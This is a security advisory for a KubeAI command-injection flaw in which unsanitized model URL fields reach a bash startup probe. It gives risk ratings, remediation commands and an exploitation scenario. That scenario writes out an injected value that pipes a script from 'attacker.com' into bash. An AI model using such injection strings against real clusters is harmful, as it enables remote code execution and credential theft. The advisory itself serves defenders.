CVE-2026-34940: KubeAI: RCE via shell injection in Ollama startup probe

UNKNOWN

Published April 6, 2026

CISO Take

KubeAI's ollamaStartupProbeScript() function constructs bash commands using unsanitized model URL parameters (ref, modelParam), enabling OS command injection (CWE-78) that Kubernetes executes as a startup probe inside model server pods. Any principal with RBAC permissions to create or modify Model custom resources can run arbitrary commands in your LLM inference pods — potentially exposing model weights, API credentials, and internal cluster network access. While no public exploit exists and CISA KEV status is negative, this is a straightforward OS command injection requiring minimal skill once cluster-level access to Model CRDs is obtained. Upgrade to KubeAI 0.23.2 immediately; as interim mitigation, tightly restrict RBAC for the Model custom resource (create/update/patch verbs) to trusted operators only.

Sources: NVD GitHub Advisory ATLAS

Risk Assessment

Effective risk is HIGH despite the absent CVSS score. CWE-78 OS command injection executed via bash -c inside Kubernetes pods is inherently critical when reachable. The attack surface is gated behind Kubernetes RBAC for Model custom resources, reducing external exposure but not insider or post-compromise threat actor risk. In multi-tenant clusters, over-permissive CI/CD service accounts, or environments where users can submit model definitions, this becomes trivially exploitable. RCE inside model serving pods directly threatens confidentiality of LLM inference infrastructure. Any automated pipeline that processes external model URLs into Model CRDs dramatically expands the blast radius.

Severity & Risk

CVSS 3.1

N/A

EPSS

N/A

Exploitation Status

No known exploitation

Sophistication

Moderate

Recommended Action

PATCH: Upgrade KubeAI to 0.23.2 — the fix sanitizes model URL components before shell command construction.
RBAC AUDIT: Restrict Kubernetes RBAC on Model custom resources immediately — deny create/update/patch to all principals except trusted operators. Run: kubectl get rolebindings,clusterrolebindings -A -o json | grep -i model to surface over-permissive bindings.
REVIEW: Audit existing Model CRDs for suspicious injected values in ref/modelParam fields: kubectl get models -A -o yaml | grep -E '(ref|modelParam)' and inspect for shell metacharacters (;, |, $, backticks).
DETECT: Monitor model server pods for unexpected child processes spawned from startup probes using Falco or similar runtime security tools.
HARDEN: Apply Pod Security Standards (restricted profile) and NetworkPolicies to model serving namespaces to limit blast radius if exploitation occurs.

Classification

Code Execution Inference Framework AML.T0012 - Valid Accounts AML.T0049 - Exploit Public-Facing Application AML.T0050 - Command and Scripting Interpreter

Compliance Impact

This CVE is relevant to:

EU AI Act

Article 9 - Risk management system

ISO 42001

A.9.1 - Security of AI systems

NIST AI RMF

MANAGE 2.2 - Risks associated with AI system components

OWASP LLM Top 10

LLM06:2025 - Excessive Agency

Technical Details

NVD Description

KubeAI is an AI inference operator for kubernetes. Prior to 0.23.2, the ollamaStartupProbeScript() function in internal/modelcontroller/engine_ollama.go constructs a shell command string using fmt.Sprintf with unsanitized model URL components (ref, modelParam). This shell command is executed via bash -c as a Kubernetes startup probe. An attacker who can create or update Model custom resources can inject arbitrary shell commands that execute inside model server pods. This vulnerability is fixed in 0.23.2.

Exploitation Scenario

An attacker holding Kubernetes credentials that allow Model CRD updates — obtained via a compromised CI/CD service account, misconfigured RBAC, or insider access — crafts a Model resource with a malicious modelParam field such as 'llama3; curl http://attacker.com/implant.sh | bash; echo '. When KubeAI's controller processes this resource, ollamaStartupProbeScript() interpolates the unsanitized value into a bash -c command that Kubernetes executes as the pod startup probe. The injected commands run inside the model server container with the pod's service account privileges, enabling the attacker to exfiltrate Hugging Face tokens, cloud provider credentials, or model artifacts, pivot to other cluster services via the internal network, or establish persistence inside the inference infrastructure for long-term access.